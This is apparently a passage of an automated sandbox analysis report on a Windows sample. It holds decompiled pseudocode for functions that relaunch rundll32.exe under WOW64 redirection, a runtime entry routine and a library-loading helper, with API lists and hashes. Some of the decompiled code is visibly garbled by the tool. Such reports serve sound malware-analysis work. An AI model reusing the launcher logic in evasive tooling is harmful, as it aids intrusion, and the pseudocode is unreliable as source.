                                              • API String ID: 833452776-189316523
                                              • Opcode ID: 4b1a8ba44820131c68a0fdbdf46d4b4c8b53556b237a60676b06e3a5147c6ba6
                                              • Instruction ID: 559ee61de89b112b7e8eb7522cc35408620dcdef79524c9f1530b06254d7b708
                                              • Opcode Fuzzy Hash: 4b1a8ba44820131c68a0fdbdf46d4b4c8b53556b237a60676b06e3a5147c6ba6
                                              • Instruction Fuzzy Hash: 264193B1901218ABCB20DFB4DC8CBDEB7FCAB48324F5446A5E91AD3191D7789A85CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007639D0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 132processsynchronizationCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              C-Code - Quality: 44%
                                              			E007639D0(intOrPtr __eax, signed int __ebx, char __edx, void* __eflags) {
				intOrPtr _v0;
				signed int _v4;
				signed int _v12;
				short _v528;
				struct _SECURITY_ATTRIBUTES* _v532;
				struct _PROCESS_INFORMATION _v548;
				struct _STARTUPINFOW _v616;
				void* __edi;
				void* __esi;
				intOrPtr _t26;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t35;
				void* _t36;
				int _t48;
				long _t50;
				void* _t57;
				signed int _t60;
				void* _t64;
				void* _t69;
				void* _t70;
				intOrPtr* _t71;
				signed int _t73;
				signed int _t75;

				_t62 = __edx;
				_t56 = __ebx;
				_t26 = __eax;
				asm("loopne 0xffffffbf");
				asm("in al, 0xfc");
				_push(0x8e4b804b);
				asm("pushfd");
				if(__eflags != 0) {
					 *(__edx + 0x73) =  *(__edx + 0x73) ^ __ebx;
					 *((char*)(__eax - 0x6f6f6f70)) = __edx;
					_push(_t73);
					_t73 = _t75;
					_t75 = _t75 - 0x268;
					_v12 =  *0x765040 ^ _t73;
					_t26 = _v0;
					_push(__ebx);
					_t56 = 0;
				}
				_v532 = _t56;
				_t27 = E007629B3(_t26); // executed
				_t69 = _t27;
				_t29 = GetCurrentProcess();
				__imp__IsWow64Process(_t29,  &_v532);
				if(_t29 == 0 || _v532 == _t56) {
					L14:
					_t30 = 0;
					__eflags = 0;
				} else {
					_t60 = 8;
					_v616.dwXCountChars = _t56;
					memset( &(_v616.dwYCountChars), 0, _t60 << 2);
					__imp__GetNativeSystemInfo( &(_v616.dwXCountChars)); // executed
					_t35 = 9;
					if(_t35 != _v616.dwXCountChars || _t69 == 0x8664) {
						_t36 = 6;
						if(_t36 != _v616.dwXCountChars || _t69 == 0x200) {
							if(GetSystemDirectoryW( &_v528, 0xf6) == 0 || E0076384E( &_v528, 0x105, L"rundll32.exe", _t56) < 0) {
								goto L14;
							} else {
								_t71 = __imp__Wow64EnableWow64FsRedirection;
								 *_t71(_t56);
								memset( &(_v616.lpReserved), _t56, 0x40);
								_v616.cb = 0x44;
								_t48 = CreateProcessW( &_v528, GetCommandLineW(), _t56, _t56, _t56, _t56, _t56, _t56,  &_v616,  &_v548); // executed
								if(_t48 == 0) {
									goto L14;
								} else {
									 *_t71(1);
									_t50 = WaitForSingleObject(_v548.hProcess, 0xffffffff);
									CloseHandle(_v548);
									CloseHandle(_v548.hThread);
									if(_t50 != _t56) {
										goto L14;
									} else {
										_t30 = 1;
									}
								}
							}
						} else {
							goto L14;
						}
					} else {
						goto L14;
					}
				}
				_pop(_t64);
				_pop(_t70);
				_pop(_t57);
				return E00761189(_t30, _t57, _v4 ^ _t73, _t62, _t64, _t70);
			}




























                                              0x007639d0
                                              0x007639d0
                                              0x007639d0
                                              0x007639d0
                                              0x007639d2
                                              0x007639d4
                                              0x007639d9
                                              0x007639da
                                              0x007639dc
                                              0x007639df
                                              0x007639e7
                                              0x007639e8
                                              0x007639ea
                                              0x007639f7
                                              0x007639fa
                                              0x007639fd
                                              0x00763a00
                                              0x00763a00
                                              0x00763a03
                                              0x00763a09
                                              0x00763a0e
                                              0x00763a17
                                              0x00763a1e
                                              0x00763a26
                                              0x00763b45
                                              0x00763b45
                                              0x00763b45
                                              0x00763a38
                                              0x00763a3a
                                              0x00763a3d
                                              0x00763a49
                                              0x00763a52
                                              0x00763a5a
                                              0x00763a62
                                              0x00763a72
                                              0x00763a7a
                                              0x00763a9c
                                              0x00000000
                                              0x00763ac1
                                              0x00763ac1
                                              0x00763ac8
                                              0x00763ad4
                                              0x00763af0
                                              0x00763b08
                                              0x00763b10
                                              0x00000000
                                              0x00763b12
                                              0x00763b14
                                              0x00763b1e
                                              0x00763b32
                                              0x00763b3a
                                              0x00763b3e
                                              0x00000000
                                              0x00763b40
                                              0x00763b42
                                              0x00763b42
                                              0x00763b3e
                                              0x00763b10
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00763a62
                                              0x00763b4a
                                              0x00763b4b
                                              0x00763b4e
                                              0x00763b55

                                              APIs
                                              • GetCurrentProcess.KERNEL32(?,00762411,000000C1,?,00000000), ref: 00763A17
                                              • IsWow64Process.KERNEL32(00000000), ref: 00763A1E
                                              • GetNativeSystemInfo.KERNEL32(?), ref: 00763A52
                                              • GetSystemDirectoryW.KERNEL32(?,000000F6), ref: 00763A94
                                              • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00763AC8
                                              • memset.MSVCRT ref: 00763AD4
                                              • GetCommandLineW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00763AFA
                                              • CreateProcessW.KERNEL32(?,00000000), ref: 00763B08
                                              • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00763B14
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00763B1E
                                              • CloseHandle.KERNEL32(?), ref: 00763B32
                                              • CloseHandle.KERNEL32(?), ref: 00763B3A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: Wow64$Process$CloseEnableHandleRedirectionSystem$CommandCreateCurrentDirectoryInfoLineNativeObjectSingleWaitmemset
                                              • String ID: D$rundll32.exe
                                              • API String ID: 233067003-895393680
                                              • Opcode ID: c6d551b07e595d2067825e1f4bbaf5cfc5147a9d87ffb47bcac61f8f40912770
                                              • Instruction ID: c7499379236501156b443786157e3959595c2307d3d9e41aff499e6b9092b750
                                              • Opcode Fuzzy Hash: c6d551b07e595d2067825e1f4bbaf5cfc5147a9d87ffb47bcac61f8f40912770
                                              • Instruction Fuzzy Hash: B04188B2900219AFDF60ABA0DC4DFDEB778AB04710F4444A6E90BE7151DA799E84CF64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007639E5 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 112processsynchronizationCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              C-Code - Quality: 65%
                                              			E007639E5(void* __edx, intOrPtr _a4) {
				signed int _v8;
				short _v532;
				char _v536;
				struct _PROCESS_INFORMATION _v552;
				struct _STARTUPINFOW _v620;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				intOrPtr* _t26;
				void* _t28;
				void* _t29;
				void* _t34;
				void* _t35;
				int _t47;
				long _t49;
				signed int _t56;
				void* _t58;
				void* _t60;
				intOrPtr* _t61;
				signed int _t62;

				_t58 = __edx;
				_v8 =  *0x765040 ^ _t62;
				_t25 = _a4;
				_v536 = 0;
				_t26 = E007629B3(_t25); // executed
				_t61 = _t26;
				_t28 = GetCurrentProcess();
				__imp__IsWow64Process(_t28,  &_v536);
				if(_t28 == 0 || _v536 == 0) {
					L12:
					_t29 = 0;
				} else {
					_t56 = 8;
					_v620.dwXCountChars = 0;
					_t60 =  &(_v620.dwYCountChars);
					memset(_t60, 0, _t56 << 2);
					_t59 = _t60 + _t56;
					__imp__GetNativeSystemInfo( &(_v620.dwXCountChars)); // executed
					_t34 = 9;
					if(_t34 != _v620.dwXCountChars || _t61 == 0x8664) {
						_t35 = 6;
						if(_t35 != _v620.dwXCountChars || _t61 == 0x200) {
							if(GetSystemDirectoryW( &_v532, 0xf6) == 0 || E0076384E( &_v532, 0x105, L"rundll32.exe", 0) < 0) {
								goto L12;
							} else {
								_t61 = __imp__Wow64EnableWow64FsRedirection;
								 *_t61(0);
								memset( &(_v620.lpReserved), 0, 0x40);
								_v620.cb = 0x44;
								_t47 = CreateProcessW( &_v532, GetCommandLineW(), 0, 0, 0, 0, 0, 0,  &_v620,  &_v552); // executed
								if(_t47 == 0) {
									goto L12;
								} else {
									 *_t61(1);
									_t49 = WaitForSingleObject(_v552.hProcess, 0xffffffff);
									_t61 = CloseHandle;
									_t59 = _t49;
									CloseHandle(_v552);
									CloseHandle(_v552.hThread);
									if(_t49 != 0) {
										goto L12;
									} else {
										_t29 = 1;
									}
								}
							}
						} else {
							goto L12;
						}
					} else {
						goto L12;
					}
				}
				return E00761189(_t29, 0, _v8 ^ _t62, _t58, _t59, _t61);
			}
























                                              0x007639e5
                                              0x007639f7
                                              0x007639fa
                                              0x00763a03
                                              0x00763a09
                                              0x00763a0e
                                              0x00763a17
                                              0x00763a1e
                                              0x00763a26
                                              0x00763b45
                                              0x00763b45
                                              0x00763a38
                                              0x00763a3a
                                              0x00763a3d
                                              0x00763a43
                                              0x00763a49
                                              0x00763a49
                                              0x00763a52
                                              0x00763a5a
                                              0x00763a62
                                              0x00763a72
                                              0x00763a7a
                                              0x00763a9c
                                              0x00000000
                                              0x00763ac1
                                              0x00763ac1
                                              0x00763ac8
                                              0x00763ad4
                                              0x00763af0
                                              0x00763b08
                                              0x00763b10
                                              0x00000000
                                              0x00763b12
                                              0x00763b14
                                              0x00763b1e
                                              0x00763b2a
                                              0x00763b30
                                              0x00763b32
                                              0x00763b3a
                                              0x00763b3e
                                              0x00000000
                                              0x00763b40
                                              0x00763b42
                                              0x00763b42
                                              0x00763b3e
                                              0x00763b10
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00763a62
                                              0x00763b55

                                              APIs
                                                • Part of subcall function 007629B3: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 007629E3
                                                • Part of subcall function 007629B3: ReadFile.KERNELBASE(00000000,?,00000040,?,00000000), ref: 00762A03
                                                • Part of subcall function 007629B3: SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 00762A1A
                                                • Part of subcall function 007629B3: ReadFile.KERNELBASE(00000000,?,000000F8,?,00000000), ref: 00762A37
                                                • Part of subcall function 007629B3: CloseHandle.KERNELBASE(00000000), ref: 00762A48
                                              • GetCurrentProcess.KERNEL32(?,00762411,000000C1,?,00000000), ref: 00763A17
                                              • IsWow64Process.KERNEL32(00000000), ref: 00763A1E
                                              • GetNativeSystemInfo.KERNEL32(?), ref: 00763A52
                                              • GetSystemDirectoryW.KERNEL32(?,000000F6), ref: 00763A94
                                              • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00763AC8
                                              • memset.MSVCRT ref: 00763AD4
                                              • GetCommandLineW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00763AFA
                                              • CreateProcessW.KERNEL32(?,00000000), ref: 00763B08
                                              • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00763B14
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00763B1E
                                              • CloseHandle.KERNEL32(?), ref: 00763B32
                                              • CloseHandle.KERNEL32(?), ref: 00763B3A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: Wow64$File$CloseHandleProcess$CreateEnableReadRedirectionSystem$CommandCurrentDirectoryInfoLineNativeObjectPointerSingleWaitmemset
                                              • String ID: D$rundll32.exe
                                              • API String ID: 446403646-895393680
                                              • Opcode ID: ed04ffe63f65c493cc10eb93a0561e7b9018b948f6d17a727cb5f8daf985c1f1
                                              • Instruction ID: 810c5eae72eecb15a79b0758322c1f03f74acee0b66eb0c2bb416e565832b32c
                                              • Opcode Fuzzy Hash: ed04ffe63f65c493cc10eb93a0561e7b9018b948f6d17a727cb5f8daf985c1f1
                                              • Instruction Fuzzy Hash: 16316B7290021DAEDF60AFA0DD8CBDE777CAB04750F4445A6E90EE2151DA789EC8CF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0076178C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 143COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 111 76178c-7617c9 call 761593 call 761e0c GetStartupInfoW 116 7617ce-7617d9 InterlockedCompareExchange 111->116 117 761903-761905 116->117 118 7617df-7617e1 116->118 120 761907-76190d 117->120 121 761912-76191d Sleep 117->121 119 7617e2-7617e9 118->119 122 761922-761929 _amsg_exit 119->122 123 7617ef-7617f6 119->123 120->119 121->116 127 76192f-76193c call 763dc5 122->127 124 762320 123->124 125 7617fc-761815 call 761763 123->125 129 76232b-762333 124->129 132 76181b-761822 125->132 133 7619b8-7619bf 125->133 134 761942-76194c 127->134 135 761858-76185f 127->135 136 761824-761835 _initterm 132->136 137 76183f-761842 132->137 138 7619c4-7619c9 call 7619ca 133->138 134->135 135->133 142 761865 135->142 136->137 140 761844-761846 InterlockedExchange 137->140 141 76184c-761852 137->141 140->141 141->127 141->135 145 761867-761871 142->145 146 761873-761877 145->146 147 7618c8-7618cb 145->147 146->129 150 76187d-76187f 146->150 148 7618d2-7618d8 147->148 149 7618cd-7618d0 147->149 151 7618e7-7618eb 148->151 152 7618da-7618de 148->152 149->146 149->148 150->145 154 762317 151->154 155 7618f1-7618fc call 761203 151->155 152->151 153 7618e0-7618e5 152->153 153->148 154->124 157 761901-76195c 155->157 159 76195e-761978 exit _XcptFilter 157->159 160 7619aa-7619af 157->160 159->160 160->138
                                              C-Code - Quality: 82%
                                              			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t28;
				signed int _t31;
				int* _t32;
				int _t33;
				int _t35;
				intOrPtr* _t36;
				void* _t42;
				signed int _t47;
				signed int _t48;
				signed int _t49;
				intOrPtr _t51;
				long _t63;
				intOrPtr _t65;
				void* _t67;

				E00761593();
				_push(0x5c);
				_push(0x7618a0);
				E00761E0C(__ebx, __edi, __esi);
				 *(_t67 - 0x1c) = 0;
				 *((intOrPtr*)(_t67 - 4)) = 0;
				GetStartupInfoW(_t67 - 0x6c);
				 *((intOrPtr*)(_t67 - 4)) = 0xfffffffe;
				 *((intOrPtr*)(_t67 - 4)) = 1;
				_t63 =  *( *[fs:0x18] + 4);
				 *((intOrPtr*)(_t67 - 0x20)) = 0;
				while(1) {
					_t28 = InterlockedCompareExchange(0x765068, _t63, 0);
					if(_t28 == 0) {
						break;
					}
					__eflags = _t28 - _t63;
					if(__eflags != 0) {
						Sleep(0x3e8);
						continue;
					} else {
						_t65 = 1;
						 *((intOrPtr*)(_t67 - 0x20)) = 1;
					}
					L3:
					if( *0x765064 == _t65) {
						_push(0x1f);
						L00763E59();
						goto L6;
					} else {
						if( *0x765064 != 0) {
							 *0x7653b4 = _t65;
							goto L6;
						} else {
							 *0x765064 = _t65;
							_t42 = E00761763(0x761890, 0x76189c); // executed
							if(_t42 != 0) {
								L33:
								 *((intOrPtr*)(_t67 - 4)) = 0xfffffffe;
								_t33 = 0xff;
								goto L34;
							} else {
								L6:
								if( *0x765064 == _t65) {
									_push(0x76188c);
									_push(0x761884); // executed
									L00761580(); // executed
									 *0x765064 = 2;
								}
								if( *((intOrPtr*)(_t67 - 0x20)) == 0) {
									InterlockedExchange(0x765068, 0);
								}
								if( *0x7653b0 != 0) {
									_push(0x7653b0);
									_t31 = E00763DC5(0, 0x765068, _t65, __eflags);
									__eflags = _t31;
									if(_t31 != 0) {
										 *0x7653b0(0, 2, 0);
									}
								}
								_t32 = __imp___wcmdln;
								if( *_t32 == 0) {
									goto L33;
								} else {
									_t35 =  *_t32;
									while(1) {
										 *(_t67 - 0x24) = _t35;
										_t47 =  *_t35 & 0x0000ffff;
										if(_t47 <= 0x20) {
											goto L16;
										}
										L14:
										if(_t47 == 0x22) {
											__eflags =  *(_t67 - 0x1c);
											 *(_t67 - 0x1c) = 0 |  *(_t67 - 0x1c) == 0x00000000;
										}
										_t35 = _t35 + 2;
										continue;
										L16:
										__eflags = _t47;
										if(_t47 != 0) {
											__eflags =  *(_t67 - 0x1c);
											if( *(_t67 - 0x1c) != 0) {
												goto L14;
											} else {
												goto L18;
											}
											while(1) {
												L18:
												_t48 =  *_t35 & 0x0000ffff;
												__eflags = _t48;
												if(_t48 == 0) {
													break;
												}
												__eflags = _t48 - 0x20;
												if(_t48 <= 0x20) {
													_t35 = _t35 + 2;
													 *(_t67 - 0x24) = _t35;
													continue;
												}
												break;
											}
											__eflags =  *(_t67 - 0x40) & 0x00000001;
											if(( *(_t67 - 0x40) & 0x00000001) != 0) {
												_t49 =  *(_t67 - 0x3c) & 0x0000ffff;
											} else {
												_t49 = 0xa;
											}
											E00761203(0x760000, 0, _t35, _t49); // executed
											 *0x765078 = _t35;
											__eflags =  *0x765050;
											if( *0x765050 != 0) {
												_t33 =  *0x765078;
												L34:
												return E007619CA(_t33);
											} else {
												exit(_t35);
												_t36 =  *((intOrPtr*)(_t67 - 0x14));
												_t51 =  *((intOrPtr*)( *_t36));
												 *((intOrPtr*)(_t67 - 0x28)) = _t51;
												_push(_t36);
												_push(_t51);
												L00763D37();
												return _t36;
											}
											goto L38;
										}
										goto L18;
									}
								}
							}
						}
					}
					L38:
				}
				_t65 = 1;
				goto L3;
			}

















                                              0x0076178c
                                              0x00761791
                                              0x00761793
                                              0x00761798
                                              0x0076179f
                                              0x007617a2
                                              0x007617a9
                                              0x007617af
                                              0x007617b6
                                              0x007617c3
                                              0x007617c6
                                              0x007617ce
                                              0x007617d1
                                              0x007617d9
                                              0x00000000
                                              0x00000000
                                              0x00761903
                                              0x00761905
                                              0x00761917
                                              0x00000000
                                              0x00761907
                                              0x00761909
                                              0x0076190a
                                              0x0076190a
                                              0x007617e2
                                              0x007617e9
                                              0x00761922
                                              0x00761924
                                              0x00000000
                                              0x007617ef
                                              0x007617f6
                                              0x00762320
                                              0x00000000
                                              0x007617fc
                                              0x007617fc
                                              0x0076180c
                                              0x00761815
                                              0x007619b8
                                              0x007619b8
                                              0x007619bf
                                              0x00000000
                                              0x0076181b
                                              0x0076181b
                                              0x00761822
                                              0x00761824
                                              0x00761829
                                              0x0076182e
                                              0x00761835
                                              0x00761835
                                              0x00761842
                                              0x00761846
                                              0x00761846
                                              0x00761852
                                              0x0076192f
                                              0x00761934
                                              0x0076193a
                                              0x0076193c
                                              0x00761946
                                              0x00761946
                                              0x0076193c
                                              0x00761858
                                              0x0076185f
                                              0x00000000
                                              0x00761865
                                              0x00761865
                                              0x00761867
                                              0x00761867
                                              0x0076186a
                                              0x00761871
                                              0x00000000
                                              0x00000000
                                              0x00761873
                                              0x00761877
                                              0x0076232d
                                              0x00762333
                                              0x00762333
                                              0x0076187e
                                              0x00000000
                                              0x007618c8
                                              0x007618c8
                                              0x007618cb
                                              0x007618cd
                                              0x007618d0
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x007618d2
                                              0x007618d2
                                              0x007618d2
                                              0x007618d5
                                              0x007618d8
                                              0x00000000
                                              0x00000000
                                              0x007618da
                                              0x007618de
                                              0x007618e1
                                              0x007618e2
                                              0x00000000
                                              0x007618e2
                                              0x00000000
                                              0x007618de
                                              0x007618e7
                                              0x007618eb
                                              0x00762317
                                              0x007618f1
                                              0x007618f3
                                              0x007618f3
                                              0x007618fc
                                              0x00761951
                                              0x00761956
                                              0x0076195c
                                              0x007619aa
                                              0x007619c4
                                              0x007619c9
                                              0x0076195e
                                              0x0076195f
                                              0x00761965
                                              0x0076196a
                                              0x0076196c
                                              0x0076196f
                                              0x00761970
                                              0x00761971
                                              0x00761978
                                              0x00761978
                                              0x00000000
                                              0x0076195c
                                              0x00000000
                                              0x007618cb
                                              0x00761867
                                              0x0076185f
                                              0x00761815
                                              0x007617f6
                                              0x00000000
                                              0x007617e9
                                              0x007617e1
                                              0x00000000

                                              APIs
                                                • Part of subcall function 00761593: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 007615C1
                                                • Part of subcall function 00761593: GetCurrentProcessId.KERNEL32 ref: 007615CD
                                                • Part of subcall function 00761593: GetCurrentThreadId.KERNEL32 ref: 007615D5
                                                • Part of subcall function 00761593: GetTickCount.KERNEL32 ref: 007615DD
                                                • Part of subcall function 00761593: QueryPerformanceCounter.KERNEL32(?), ref: 007615E9
                                              • GetStartupInfoW.KERNEL32(?,007618A0,0000005C), ref: 007617A9
                                              • InterlockedCompareExchange.KERNEL32(00765068,?,00000000), ref: 007617D1
                                              • _initterm.MSVCRT ref: 0076182E
                                              • InterlockedExchange.KERNEL32(00765068,00000000), ref: 00761846
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: CurrentExchangeInterlockedTime$CompareCountCounterFileInfoPerformanceProcessQueryStartupSystemThreadTick_initterm
                                              • String ID: hPv
                                              • API String ID: 812915189-3126381271
                                              • Opcode ID: a78e14fbb54df5cf40034289e7eed2eeff644aa2921b503ee3ef2b353475eb78
                                              • Instruction ID: cc772dfee68b149af4550054c27707f062f071e454221a42b5d65cd29abe6b13
                                              • Opcode Fuzzy Hash: a78e14fbb54df5cf40034289e7eed2eeff644aa2921b503ee3ef2b353475eb78
                                              • Instruction Fuzzy Hash: 6E41DDB1A04346DFCB24AFA0D89D67D77B4EB05721FD8412AE903A7291C7BC9C40EB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00761B87 Relevance: 7.6, APIs: 5, Instructions: 98memorystringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 161 761b87-761baa call 7614bd 163 761baf-761bb4 161->163 164 761bb6-761bcd call 761c02 163->164 165 761bf5-761bfa 163->165 168 762494-7624a2 call 76389e 164->168 169 761bd3-761bdd 164->169 173 7624a7-7624b0 FreeLibrary 168->173 171 762174-762179 169->171 172 761be3-761bf4 169->172 171->172 174 76217f-762182 171->174 172->165 174->172 175 762188-7621b7 lstrlenW WideCharToMultiByte LocalAlloc 174->175 176 76247f-762492 call 76389e 175->176 177 7621bd-7621d6 WideCharToMultiByte 175->177 176->173 177->172
                                              C-Code - Quality: 70%
                                              			E00761B87(void* __edx, void* __eflags, intOrPtr _a4, char* _a8, int _a12, short* _a16, struct HINSTANCE__** _a20, intOrPtr* _a24, char** _a28) {
				int _v8;
				char _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				struct HINSTANCE__* _t36;
				intOrPtr _t38;
				long _t44;
				char* _t45;
				short* _t51;
				int _t61;

				_t57 = __edx;
				 *_a20 = 0;
				 *_a24 = 0;
				_v8 = 0;
				 *_a28 = 0; // executed
				_t36 = E007614BD(_a4, _a8); // executed
				_v16 = _t36;
				if(_t36 != 0) {
					_v12 = 0;
					_t38 = E00761C02(_t36, _a12,  &_v12);
					_v20 = _t38;
					if(_t38 == 0) {
						E0076389E(__edx, _a4, 0x400, _a8, _a12);
						goto L12;
					} else {
						_v8 = 1;
						if(_v12 != 0) {
							_t51 = _a16;
							if(_t51 == 0 ||  *_t51 == 0) {
								goto L3;
							} else {
								_t61 = lstrlenW(_t51) + 1;
								_t44 = WideCharToMultiByte(0, 0x400, _t51, _t61, 0, 0, 0, 0);
								_a12 = _t44;
								_t45 = LocalAlloc(0, _t44);
								_a8 = _t45;
								_push(0);
								if(_t45 == 0) {
									_push(_a16);
									_push(0x300);
									_push(_a4);
									E0076389E(_t57);
									_v8 = 0;
									L12:
									FreeLibrary(_v16);
									goto L4;
								} else {
									WideCharToMultiByte(0, 0x400, _a16, _t61, _t45, _a12, 0, ??);
									 *_a28 = _a8;
									goto L3;
								}
							}
							L13:
						} else {
							L3:
							 *_a20 = _v16;
							 *_a24 = _v20;
						}
					}
					L4:
				}
				return _v8;
				goto L13;
			}













                                              0x00761b87
                                              0x00761b9b
                                              0x00761ba0
                                              0x00761ba5
                                              0x00761ba8
                                              0x00761baa
                                              0x00761baf
                                              0x00761bb4
                                              0x00761bbf
                                              0x00761bc3
                                              0x00761bc8
                                              0x00761bcd
                                              0x007624a2
                                              0x00000000
                                              0x00761bd3
                                              0x00761bd3
                                              0x00761bdd
                                              0x00762174
                                              0x00762179
                                              0x00000000
                                              0x00762188
                                              0x00762195
                                              0x007621a4
                                              0x007621a8
                                              0x007621ab
                                              0x007621b1
                                              0x007621b4
                                              0x007621b7
                                              0x0076247f
                                              0x00762482
                                              0x00762487
                                              0x0076248a
                                              0x0076248f
                                              0x007624a7
                                              0x007624aa
                                              0x00000000
                                              0x007621bd
                                              0x007621cc
                                              0x007621d4
                                              0x00000000
                                              0x007621d4
                                              0x007621b7
                                              0x00000000
                                              0x00761be3
                                              0x00761be3
                                              0x00761be9
                                              0x00761bf1
                                              0x00761bf1
                                              0x00761bdd
                                              0x00761bf3
                                              0x00761bf4
                                              0x00761bfa
                                              0x00000000

                                              APIs
                                                • Part of subcall function 007614BD: LoadLibraryExW.KERNELBASE(?,00000000,00000008,00000000,00000000,00000001), ref: 007614E7
                                                • Part of subcall function 007614BD: RtlImageNtHeader.NTDLL(00000000), ref: 007614FC
                                                • Part of subcall function 007614BD: SetProcessDEPPolicy.KERNEL32(00000003), ref: 00761513
                                                • Part of subcall function 00761C02: lstrlenW.KERNEL32(?,00000000,00000000,00000001,?,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000), ref: 00761C27
                                                • Part of subcall function 00761C02: LocalAlloc.KERNEL32(00000000,00000002,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00761C38
                                                • Part of subcall function 00761C02: WideCharToMultiByte.KERNEL32(00000000,00000400,?,00000001,00000000,00000000,00000000,00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?), ref: 00761C54
                                                • Part of subcall function 00761C02: lstrlenA.KERNEL32(00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00761C5F
                                                • Part of subcall function 00761C02: GetProcAddress.KERNEL32(?,00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00761C79
                                                • Part of subcall function 00761C02: LocalFree.KERNEL32(00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00761C87
                                              • lstrlenW.KERNEL32(00000001,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?), ref: 00762189
                                              • WideCharToMultiByte.KERNEL32(00000000,00000400,00000001,00000001,00000000,00000000,00000000,00000000), ref: 007621A4
                                              • LocalAlloc.KERNEL32(00000000,00000000), ref: 007621AB
                                              • WideCharToMultiByte.KERNEL32(00000000,00000400,00000000,00000001,00000000,?,00000000,00000000), ref: 007621CC
                                              • FreeLibrary.KERNEL32(?,?,00000400,?,00000000,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?), ref: 007624AA
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: ByteCharLocalMultiWidelstrlen$AllocFreeLibrary$AddressHeaderImageLoadPolicyProcProcess
                                              • String ID:
                                              • API String ID: 2400347670-0
                                              • Opcode ID: 8e66d173d8fdf4bda12c427b96ee21b3238e1287ff1f1afc9446f9c2779ed6eb
                                              • Instruction ID: 9e6352f2698d034e8de3580f1e45a52f2e1f3317cd506f5b7269ec10e41130f7
                                              • Opcode Fuzzy Hash: 8e66d173d8fdf4bda12c427b96ee21b3238e1287ff1f1afc9446f9c2779ed6eb
                                              • Instruction Fuzzy Hash: 9F3132B0901258EFCB129FA4CC88DAE7FB8FF09750F148045F90AA7220D7789A51CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007629B3 Relevance: 7.6, APIs: 5, Instructions: 68fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
